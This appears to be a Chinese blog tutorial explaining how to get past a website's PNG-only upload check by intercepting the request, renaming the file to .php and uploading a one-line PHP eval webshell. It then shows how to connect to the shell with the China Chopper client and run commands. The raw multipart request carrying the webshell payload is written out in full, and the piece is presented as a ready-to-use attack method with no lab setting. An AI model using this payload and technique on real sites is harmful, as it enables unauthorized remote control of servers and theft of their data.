如何绕过图片格式限制上传木马获取WebShell
2018-03-04 10:55
357 查看
图片上传网站木马教程思路: 图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示,记录下来后用菜刀连接即可。(1)网站要求上传png格式的文件(2)保存-抓包,将文件后缀.png删除,剩余.php文件继续提交,提示成功。Content-Disposition: form-data; name="fun_menu_icon"test123trojan.php-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_icon_upload"; filename="test123trojan.php"Content-Type: image/png<?php @eval($_POST['caidao']); ?>-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_img"test123trojan.php-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_img_upload"; filename="test123trojan.php"Content-Type: image/png<?php @eval($_POST['caidao']); ?>(3)在原始数据提交页面或提交数据后response页面中查找上传路径并记录(4)打开最新版中国菜刀,添加已经记录的路径,添加密码caidao(5)连接虚拟终端,输入ipconfig 木马成功上传并执行。 喜欢我的关注,更多资源分享
相关文章推荐
- 绕过图片格式限制上传木马获取WebShell
- 上传图片时如何在前端限制图片的大小,获取图片的名称
- 如何区分上传的图片是不是木马?
- 关于input type="file" 上传图片,如何限制上传图片的分辨率
- 前端如何限制图片的大小和格式
- php中web上传文件的原理及如何限制上传文件的大小及格式
- ckfinder 在上传图片后, ckeditor 获取图片路径时 多了个斜杠 如何解决呀?
- php中web上传文件的原理及如何限制上传文件的大小及格式
- Struts2限制上传图片的格式
- jquery如何获取input(file)控件上传的图片名称,即"11111.jpg"
- Iterator<FileItem>的使用,实现文件(图片)上传,限制图片格式,设置随机文件名
- 实名认证,上传图片的问题,只能上传图片格式,并且还有限制大小
- 通过input 的file 控件,上传图片,如何获取文件的大小问题
- 图片木马绕过站点上传文件检查
- js 限制图片上传的格式与大小
- 一个自己写的真正判断文件格式,文件大小,而并不仅仅从扩展名来进行判断的上传方法,进一步加强防止软件或恶意的木马图片上传
- JS收集:图片上传_限制格式、类型、尺寸
- 如何在客户端获取上传图片的大小
- JavaScript上传图片的方法 判断图片的格式和大小、获取图片的base64编码
- fckeditor 2.6如何修改图片上传路径和格式